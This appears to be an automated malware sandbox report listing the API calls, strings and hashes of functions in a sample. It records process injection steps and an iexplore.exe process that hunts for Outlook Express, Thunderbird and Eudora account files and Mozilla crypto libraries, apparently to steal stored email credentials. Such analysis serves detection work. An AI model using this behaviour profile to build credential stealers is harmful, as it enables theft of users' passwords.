                                                                                                    • API String ID: 2574300362-2227199552
                                                                                                    • Opcode ID: cf6c50f50f44cecb4388a2af7e072cf3b9c31d8bc14ef792baaddb37fc731a17
                                                                                                    • Instruction ID: c3f2c9e477f8672f67090740fae2e549de1e6c2fb6487af2d15ed3ca5984443d
                                                                                                    • Opcode Fuzzy Hash: cf6c50f50f44cecb4388a2af7e072cf3b9c31d8bc14ef792baaddb37fc731a17
                                                                                                    • Instruction Fuzzy Hash: DC110D20D0C6C9EDEB12C7ACC4087DEBEF55B16709F0880E8C585A6292C7BA5658C776
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040923A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00409252
                                                                                                    • SendMessageA.USER32(?,00001019,00000000,?), ref: 00409281
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendmemset
                                                                                                    • String ID: "
                                                                                                    • API String ID: 568519121-123907689
                                                                                                    • Opcode ID: 462f7bc00b01c5c665d1b728afa31af522ee25155d9d26ee29ef20d9ca5f4486
                                                                                                    • Instruction ID: 143eebe103db385490b988b1a572ada648b34fe061aa254f91e3f3e50342256c
                                                                                                    • Opcode Fuzzy Hash: 462f7bc00b01c5c665d1b728afa31af522ee25155d9d26ee29ef20d9ca5f4486
                                                                                                    • Instruction Fuzzy Hash: 0A01A275800205FBDB218F95C845AAFB7B8FF84B59F00842DE854A6281E3349945CB69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C3AF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegisterClassA.USER32(?), ref: 0040C3F0
                                                                                                    • CreateWindowExA.USER32(00000000,MessenPass,MessenPass,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000), ref: 0040C418
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ClassCreateRegisterWindow
                                                                                                    • String ID: MessenPass
                                                                                                    • API String ID: 3469048531-1347981195
                                                                                                    • Opcode ID: 67992f16593fd71ff76a11f6399149812f2a11e7935b78172462f25744a6f341
                                                                                                    • Instruction ID: df568ce2afab08691587747be1d5034a2dd7dfffecd18501b630fd2d0d2d029c
                                                                                                    • Opcode Fuzzy Hash: 67992f16593fd71ff76a11f6399149812f2a11e7935b78172462f25744a6f341
                                                                                                    • Instruction Fuzzy Hash: 0701E8B5D00608AFDB11CF9ACD49ADFFFF8EB89704F10802BE541A6250D7B46640CB68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408A29, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadMenuA.USER32(00000000), ref: 00408A31
                                                                                                    • sprintf.MSVCRT ref: 00408A54
                                                                                                      • Part of subcall function 004088D4: GetMenuItemCount.USER32(?), ref: 004088EA
                                                                                                      • Part of subcall function 004088D4: memset.MSVCRT ref: 0040890E
                                                                                                      • Part of subcall function 004088D4: GetMenuItemInfoA.USER32(?), ref: 00408944
                                                                                                      • Part of subcall function 004088D4: memset.MSVCRT ref: 00408971
                                                                                                      • Part of subcall function 004088D4: strchr.MSVCRT ref: 0040897D
                                                                                                      • Part of subcall function 004088D4: _mbscat.MSVCRT ref: 004089D8
                                                                                                      • Part of subcall function 004088D4: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 004089F4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                    • String ID: menu_%d
                                                                                                    • API String ID: 1129539653-2417748251
                                                                                                    • Opcode ID: a21fc8c0a1f872effcd217c56cb1ebd2d456d0f88aeeed4053934f629e37b6cb
                                                                                                    • Instruction ID: 6e6fd20b795a8bab19114a67d1783e5b01d02cb8a2ade4a69635827cbafc1364
                                                                                                    • Opcode Fuzzy Hash: a21fc8c0a1f872effcd217c56cb1ebd2d456d0f88aeeed4053934f629e37b6cb
                                                                                                    • Instruction Fuzzy Hash: EBD0C232A0030076E61033276C0EFCB29195BD2B19F54807FF400710C5DEBD018487AC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406BC3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowsDirectoryA.KERNEL32(0041E458,00000104,?,00411228,00000000,?,00000000,00000104,00000000), ref: 00406BD8
                                                                                                    • _mbscpy.MSVCRT ref: 00406BE8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryWindows_mbscpy
                                                                                                    • String ID: XA
                                                                                                    • API String ID: 257536871-3740220071
                                                                                                    • Opcode ID: 861364e7de9ee2ae089174bca0caadeda4635289f72fc20d00e4fde06078ff85
                                                                                                    • Instruction ID: 8f816420b632b6a764ea2497921bafe0203b6dc712d69cfd7b43a4c86b5ca7f0
                                                                                                    • Opcode Fuzzy Hash: 861364e7de9ee2ae089174bca0caadeda4635289f72fc20d00e4fde06078ff85
                                                                                                    • Instruction Fuzzy Hash: 47D05E7540C260BFF7109B12FC45AC63FE4EF49334F10803AF804961A0EB746981869C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409141, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004069E8: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409147,00000000,0040905A,?,00000000,00000104), ref: 004069F3
                                                                                                    • strrchr.MSVCRT ref: 0040914A
                                                                                                    • _mbscat.MSVCRT ref: 0040915F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName_mbscatstrrchr
                                                                                                    • String ID: _lng.ini
                                                                                                    • API String ID: 3334749609-1948609170
                                                                                                    • Opcode ID: 08864fd35b35f6e10160a6b7cad974f4c4e5e5894a63cb91cea6d61644888c54
                                                                                                    • Instruction ID: a8986b5d0fc5065fa4420194992ab4643f38d39362f1d3b193e5f677e6d35072
                                                                                                    • Opcode Fuzzy Hash: 08864fd35b35f6e10160a6b7cad974f4c4e5e5894a63cb91cea6d61644888c54
                                                                                                    • Instruction Fuzzy Hash: D7C0127124565054E11231222D03BCB05480F12705F29006FFC01781C3EE5D4A9180AE
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407E33, Relevance: 5.1, APIs: 4, Instructions: 108stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3110682361-0
                                                                                                    • Opcode ID: 21470b65325c4646694a84c407f8fe9269b35ac8cd8724ca01919c7c57aa0683
                                                                                                    • Instruction ID: 94145ba3e6d447937b4e48053a9a2b44a3b831c7855691199b8e714b6b5b9eaf
                                                                                                    • Opcode Fuzzy Hash: 21470b65325c4646694a84c407f8fe9269b35ac8cd8724ca01919c7c57aa0683
                                                                                                    • Instruction Fuzzy Hash: 9941C372D041199BCF109FA9C841BDEBFB8EF49314F1041B6E955B7281C238AA85CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004092CC, Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1860491036-0
                                                                                                    • Opcode ID: 1bd1a042b885c515cafa8077495e00bace8610073d8da212d6e8c1d7679ca43c
                                                                                                    • Instruction ID: 542bc7e3926c6d60784d6f8799ebb0262de6c8f0aff60c73b96b1684488c9edf
                                                                                                    • Opcode Fuzzy Hash: 1bd1a042b885c515cafa8077495e00bace8610073d8da212d6e8c1d7679ca43c
                                                                                                    • Instruction Fuzzy Hash: 9621B3B0A053008FDB558F6A9845955FBF8FF94311B2AC9AFD508DB2B2D7B8C9409F14
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004086ED, Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1033339047-0
                                                                                                    • Opcode ID: 949953223f8e9f4be0123e64353e30bed0322445959412ce4c80275753eae598
                                                                                                    • Instruction ID: 62cae8e83bd5d1efe0b7207de595a3d8a96caeb03304a295a8faf49e2a024305
                                                                                                    • Opcode Fuzzy Hash: 949953223f8e9f4be0123e64353e30bed0322445959412ce4c80275753eae598
                                                                                                    • Instruction Fuzzy Hash: 58F04FB96012005EFB589F36ED4679576F0A708309F18C53EE9058B2F4EB7444448F1D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Analysis Process: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe PID: 6972 Parent PID: 5088 D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCOMMON

                                                                                                    Executed Functions

                                                                                                    Function 02BF4D65, Relevance: 8.2, APIs: 1, Strings: 3, Instructions: 1223COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoadMemoryProtectVirtual
                                                                                                    • String ID: )Hg$R$q!d
                                                                                                    • API String ID: 3389902171-1250440267
                                                                                                    • Opcode ID: 82fd58cf6e9aba166a2ae27eab7a2e717954f6644a090fb119a56b7d9922f724
                                                                                                    • Instruction ID: 535b79e9eaac22a9aaecd4cfe09d80d3ba549b8aa592a352b5292783b3c192e8
                                                                                                    • Opcode Fuzzy Hash: 82fd58cf6e9aba166a2ae27eab7a2e717954f6644a090fb119a56b7d9922f724
                                                                                                    • Instruction Fuzzy Hash: B2B212716083899FDB749F38CC987DABBA2FF56310F45819ECD998B255D3308A85CB12
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02BE3E05, Relevance: 7.8, APIs: 2, Strings: 2, Instructions: 827COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • TerminateProcess.KERNELBASE(63541DC6), ref: 02BED0B3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ProcessTerminate
                                                                                                    • String ID: )Hg$q!d
                                                                                                    • API String ID: 560597551-3470481063
                                                                                                    • Opcode ID: 23d5fba9b6d083401923f09a052ef876478e30eebc88e7e80a0e94c3a111cf2d
                                                                                                    • Instruction ID: 28881cefa854e0ea9279f0e1de3c472900cb2d6b3d641a5c30286f8f27edf789
                                                                                                    • Opcode Fuzzy Hash: 23d5fba9b6d083401923f09a052ef876478e30eebc88e7e80a0e94c3a111cf2d
                                                                                                    • Instruction Fuzzy Hash: A072FC72608389DFCB649F38CC857DABBA1FF55310F55826EDD899B260C3309A85CB42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02BEDA66, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 484memorynativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 02BF20DC: LoadLibraryA.KERNELBASE(FEA7A63B), ref: 02BF2245
                                                                                                    • NtAllocateVirtualMemory.NTDLL(-000000021172D3F9,?,E3DA1026), ref: 02BEDE47
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                                    • String ID: )Hg$q!d
                                                                                                    • API String ID: 2616484454-3470481063
                                                                                                    • Opcode ID: 303cdd50e10ab6a21bfc457addbbaff45327540a73ebf046717a75add9e66176
                                                                                                    • Instruction ID: bfcbe6b77ca11614576869884f8d7732da33fbd77c7d5b4136946719021954ee
                                                                                                    • Opcode Fuzzy Hash: 303cdd50e10ab6a21bfc457addbbaff45327540a73ebf046717a75add9e66176
                                                                                                    • Instruction Fuzzy Hash: 0FE1C77129825EDFCB31EE388CC16EABB94DB1A231F648369DC259B5D6C732C50AC740
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02BF2A7B, Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 714COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: )Hg$q!d
                                                                                                    • API String ID: 0-3470481063
                                                                                                    • Opcode ID: 1adc7d7c661839ff40bc2460def1473c106d42e9b76e29e14458419231c527ea
                                                                                                    • Instruction ID: e7821edca17a35518838068de9efbd047280905d4f277336910fcb5590368daf
                                                                                                    • Opcode Fuzzy Hash: 1adc7d7c661839ff40bc2460def1473c106d42e9b76e29e14458419231c527ea
                                                                                                    • Instruction Fuzzy Hash: 6462CAB2608389DFDB749F38CC857DABBA2FF59310F46415ADD8A9B210D3705A85CB42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02BF697A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 204COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: >Y"?
                                                                                                    • API String ID: 0-1124675244
                                                                                                    • Opcode ID: 395a6911d0ea71d7ec9e72ec80849f1d95dbdcda3624c9290b0bc74b5fcc5937
                                                                                                    • Instruction ID: f40c0a5dd3675b59dd2456f3a75f20bbf4e760fc9ca8253b50a214dd341d74a0
                                                                                                    • Opcode Fuzzy Hash: 395a6911d0ea71d7ec9e72ec80849f1d95dbdcda3624c9290b0bc74b5fcc5937
                                                                                                    • Instruction Fuzzy Hash: 71816872514348CFDBB5DE38C9907E9B7B2EF94350F1582ABCD0A9B614CB348648CB41
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02BF6439, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • NtProtectVirtualMemory.NTDLL(-E0318E4E,?,?,?,?,02BF4F95), ref: 02BF6583
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2706961497-0
                                                                                                    • Opcode ID: 22c6bf4e0eebc66014714935483e2c1206b6b7a0f0d6b7610af828494ff259fb
                                                                                                    • Instruction ID: 74a1da69f88f2d7eeac26beb45192fa6ea8eab6a73d5cd200b22d096e1459145
                                                                                                    • Opcode Fuzzy Hash: 22c6bf4e0eebc66014714935483e2c1206b6b7a0f0d6b7610af828494ff259fb
                                                                                                    • Instruction Fuzzy Hash: B61191B47047899FDB68CE1D8DA4BEBB6A2ABD8300F04827EAD5D9B744DB309900C710
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02BED382, Relevance: 1.5, APIs: 1, Instructions: 44fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNELBASE(?), ref: 02BED5F8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 01847e38541d212605e8026ea65f99b00070c1616b8e6ad131507d161d4388b9
                                                                                                    • Instruction ID: e3b58f8a31bafd44a837c20cdbba99e050ef3de117af2eb15b2ac984c7edf2e3
                                                                                                    • Opcode Fuzzy Hash: 01847e38541d212605e8026ea65f99b00070c1616b8e6ad131507d161d4388b9
                                                                                                    • Instruction Fuzzy Hash: 1111C27110C305DFDB64AE78C94AAAEBBF5FF14744F42491E99DA96560C7301681CB07
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02BF20DC, Relevance: 1.8, APIs: 1, Instructions: 318libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNELBASE(FEA7A63B), ref: 02BF2245
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: 8552969b403df588a1bf08f4dbabf7ac070821d753747a1412fc6a775e923bc2
                                                                                                    • Instruction ID: 79f2ee7d10451050985d83a4064411ed51c20e60e56cba19feb7ced581d2c7bd
                                                                                                    • Opcode Fuzzy Hash: 8552969b403df588a1bf08f4dbabf7ac070821d753747a1412fc6a775e923bc2
                                                                                                    • Instruction Fuzzy Hash: 3B9196712D916EDBCB21EE289CC15AAFB94DB0A23177483A9DC759B9D7C732C40EC640
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02BE17DD, Relevance: 1.8, APIs: 1, Instructions: 273COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnumWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1129996299-0
                                                                                                    • Opcode ID: 925f481709e8773ca988ceb73b51520a7fa83d0dd0dde5f52fcaa7f1ab24cb3b
                                                                                                    • Instruction ID: f183eda9fef79c3eaad993d7587d3499194bb0bc156a79757610a9e38e408ebf
                                                                                                    • Opcode Fuzzy Hash: 925f481709e8773ca988ceb73b51520a7fa83d0dd0dde5f52fcaa7f1ab24cb3b
                                                                                                    • Instruction Fuzzy Hash: 0C81E97129925EDFCB21EE398CC45A9FBA0DB1A230B3447A9D8759B9D7C732C40AC740
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02BED1DC, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateCreateFileMemoryVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2773895085-0
                                                                                                    • Opcode ID: 594cd7fdcdc13dc383eef53dd6517babf16a9915892e8285311120cd69312825
                                                                                                    • Instruction ID: f3568a9149e47585268dc9316a974c6b912e8b2726323047e4fdc566bf17ded4
                                                                                                    • Opcode Fuzzy Hash: 594cd7fdcdc13dc383eef53dd6517babf16a9915892e8285311120cd69312825
                                                                                                    • Instruction Fuzzy Hash: 845151712D956EEB8B71ED289CC1AAAFB94DB1A27176483A6DC319F4D7C722C40DC204
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02BE4064, Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • TerminateProcess.KERNELBASE(63541DC6), ref: 02BED0B3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ProcessTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 560597551-0
                                                                                                    • Opcode ID: efd786e141a82d31ed1351c937e25f38093ef6191c24f58f0b2c2dbacd8464ab
                                                                                                    • Instruction ID: 4cf05aec58ac0adad8a258739621b0c92cd2137f7db20135cca0acce178ae10b
                                                                                                    • Opcode Fuzzy Hash: efd786e141a82d31ed1351c937e25f38093ef6191c24f58f0b2c2dbacd8464ab
                                                                                                    • Instruction Fuzzy Hash: CAE02272C09221CBCFA14F60C814BEEB664AF05B65F1A41AE9C46B7000C7B00CD4CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02BED72E, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 4617ae0ea05f7054215e3927791824ad20d3c66cd844baf3d8b3ac2b23730666
                                                                                                    • Instruction ID: d203c5c30848708cf60ecd5fd1f22f1b2bfea9cb7c50fff4e41f017cca63e71d
                                                                                                    • Opcode Fuzzy Hash: 4617ae0ea05f7054215e3927791824ad20d3c66cd844baf3d8b3ac2b23730666
                                                                                                    • Instruction Fuzzy Hash: 42E0DF3180824687CF602F6C88026AD77A5AF09320F58839AC96B0BAC6D7309069D753
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Analysis Process: iexplore.exe PID: 3544 Parent PID: 1736 iexplore.exeCOMMON

                                                                                                    Executed Functions

                                                                                                    Function 00406EC3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406ED9
                                                                                                    • FindNextFileA.KERNEL32(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406EF7
                                                                                                    • strlen.MSVCRT ref: 00406F27
                                                                                                    • strlen.MSVCRT ref: 00406F2F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileFindstrlen$FirstNext
                                                                                                    • String ID: rA
                                                                                                    • API String ID: 379999529-474049127
                                                                                                    • Opcode ID: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                                                                    • Instruction ID: 479c8733b6b08075922562257f7174063dbd0ea9e1486761d8d5d3546bede414
                                                                                                    • Opcode Fuzzy Hash: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                                                                    • Instruction Fuzzy Hash: 00118272005205AFD714DB34E844ADBB3D9DF44324F21493FF55AD21D0EB38A9548758
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401E8B, Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00401EAD
                                                                                                    • strlen.MSVCRT ref: 00401EC6
                                                                                                    • strlen.MSVCRT ref: 00401ED4
                                                                                                    • strlen.MSVCRT ref: 00401F1A
                                                                                                    • strlen.MSVCRT ref: 00401F28
                                                                                                    • memset.MSVCRT ref: 00401FD3
                                                                                                    • atoi.MSVCRT ref: 00402002
                                                                                                    • memset.MSVCRT ref: 00402025
                                                                                                    • sprintf.MSVCRT ref: 00402052
                                                                                                      • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                                    • memset.MSVCRT ref: 004020A8
                                                                                                    • memset.MSVCRT ref: 004020BD
                                                                                                    • strlen.MSVCRT ref: 004020C3
                                                                                                    • strlen.MSVCRT ref: 004020D1
                                                                                                    • strlen.MSVCRT ref: 00402104
                                                                                                    • strlen.MSVCRT ref: 00402112
                                                                                                    • memset.MSVCRT ref: 0040203A
                                                                                                      • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                                      • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                                    • strcpy.MSVCRT(?,00000000), ref: 00402199
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004021A3
                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004021BE
                                                                                                      • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
                                                                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                    • API String ID: 2492260235-4223776976
                                                                                                    • Opcode ID: 99a5ce774bc4b8e9ff8aa6e4545981aada70dbae933f177e9ad771773f70d31f
                                                                                                    • Instruction ID: fcae88f02dbfb35d0bd4b12665d2d891c1e7b320b053452542e36e55e3802549
                                                                                                    • Opcode Fuzzy Hash: 99a5ce774bc4b8e9ff8aa6e4545981aada70dbae933f177e9ad771773f70d31f
                                                                                                    • Instruction Fuzzy Hash: C891E472904158BADB21E765CC46FDA77AC9F44308F1004BBF609F2182EB789BD58B5D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B9AD, Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 168COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404837: LoadLibraryA.KERNEL32(comctl32.dll,76020A60,?,00000000,?,?,?,0040B9C9,76020A60), ref: 00404856
                                                                                                      • Part of subcall function 00404837: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                                                      • Part of subcall function 00404837: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,76020A60), ref: 0040487C
                                                                                                      • Part of subcall function 00404837: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004048A7
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040BBF8
